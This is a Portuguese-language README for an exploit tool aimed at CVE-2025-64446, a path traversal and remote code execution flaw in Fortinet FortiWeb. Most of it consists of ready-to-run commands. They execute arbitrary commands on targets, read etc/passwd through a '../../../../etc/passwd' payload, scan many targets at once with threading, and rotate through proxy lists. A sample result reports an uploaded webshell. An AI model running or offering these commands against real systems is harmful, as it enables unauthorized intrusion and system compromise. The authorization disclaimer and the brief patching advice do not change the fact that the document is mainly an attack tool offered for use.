
Ferramenta de pesquisa de segurança para detectar e testar a vulnerabilidade CVE-2025-64446 (FortiWeb Path Traversal RCE vulnerability)
Uma ferramenta de pesquisa de segurança para detectar e testar a vulnerabilidade CVE-2025-64446 no Fortinet FortiWeb Web Application Firewall (WAF). Esta vulnerabilidade crítica de path traversal (dia zero) tem sido explorada ativamente na natureza e permite que atacantes não autenticados contornem os controles de segurança e executem código arbitrário.
Esta ferramenta destina-se exclusivamente a testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Use esta ferramenta apenas em sistemas que você possui ou para os quais possui permissão explícita por escrito para testar.
CVE-2025-64446 é uma vulnerabilidade crítica de path traversal (dia zero) no Fortinet FortiWeb WAF que tem sido explorada ativamente na natureza. Esta vulnerabilidade permite que atacantes não autenticados contornem controles de segurança através de ataques de path traversal, potencialmente levando à execução remota de código, acesso a arquivos de configuração e comprometimento total do sistema.
Pontuação CVSS: 9.8 (Crítica)
Status: Explorado ativamente na natureza
CISA KEV: Adicionado ao catálogo de vulnerabilidades conhecidas exploradas
Patch: FG-IR-25-910
Produto Afetado: Fortinet FortiWeb WAF
# Clone o repositório
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit
# Instale as dependências
pip install -r requirements.txt
# Torne os scripts executáveis (opcional)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py
# Baixe os scripts
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py
# Instale as dependências
pip install requests
# Alvo único
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com
# Executar comando personalizado
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"
# Múltiplos alvos a partir de arquivo
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json
# Com threading para varredura mais rápida
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5
# Saída detalhada para depuração
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v
# Proxy único
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port
# Múltiplos proxies a partir de arquivo
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt
# Teste POC básico
python3 cve_2025_64446_poc.py -u http://target.com
# Testar arquivo específico
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd
# Saída detalhada
python3 cve_2025_64446_poc.py -u http://target.com -v
-u, --url URL do alvo
-f, --file Arquivo contendo URLs de alvos (um por linha)
-c, --command Comando a executar (padrão: id)
-t, --threads Número de threads (padrão: 1)
-o, --output Arquivo de saída (padrão: uknf_fortiweb_results.json)
-v, --verbose Ativar logging detalhado
--proxy URL do proxy (ex.: http://127.0.0.1:8080)
--proxy-list Arquivo contendo URLs de proxy (um por linha)
O script gera um arquivo JSON com resultados detalhados:
{
"target": "http://target.com",
"timestamp": "2025-11-21T00:25:40.123456",
"fortiweb_detected": true,
"vulnerable": true,
"path_traversal_successful": true,
"config_file_read": true,
"webshell_uploaded": true,
"command_executed": "id",
"output": "uid=1000(user) gid=1000(user)...",
"vulnerable_payload": "../../../../etc/passwd"
}
Se você usa o FortiWeb WAF:
Aplique Atualizações de Segurança Imediatamente:
# Verifique a versão atual
show system status
# Atualize para a versão mais recente
execute upgrade <firmware-file>
Segmentação de Rede:
Fortalecimento de Configuração:
Requisitos da CISA:
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com
# Crie o arquivo de alvos
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# Execute a varredura
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"
# Proxy único
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080
# Múltiplos proxies a partir de arquivo
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt
# POC básico
python3 cve_2025_64446_poc.py -u https://example.com
# Testar arquivo específico
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd
Contribuições são bem-vindas! Sinta-se à vontade para enviar um Pull Request.
git checkout -b feature/AmazingFeature)git commit -m 'Adicionar alguma AmazingFeature')git push origin feature/AmazingFeature)Se você encontrar algum problema ou tiver sugestões, por favor abra uma issue no GitHub.
Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.
Se você achar esta ferramenta útil, considere dar uma estrela no GitHub!
Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizado. Os autores não são responsáveis por qualquer uso indevido ou danos causados por este programa. Os usuários são responsáveis por garantir que possuem autorização adequada antes de testar qualquer sistema.
Se você achar esta ferramenta útil e quiser apoiar o projeto:
Bitcoin (BTC):
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv
Ethereum (ETH):
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7
Obrigado pelo seu apoio! 🙏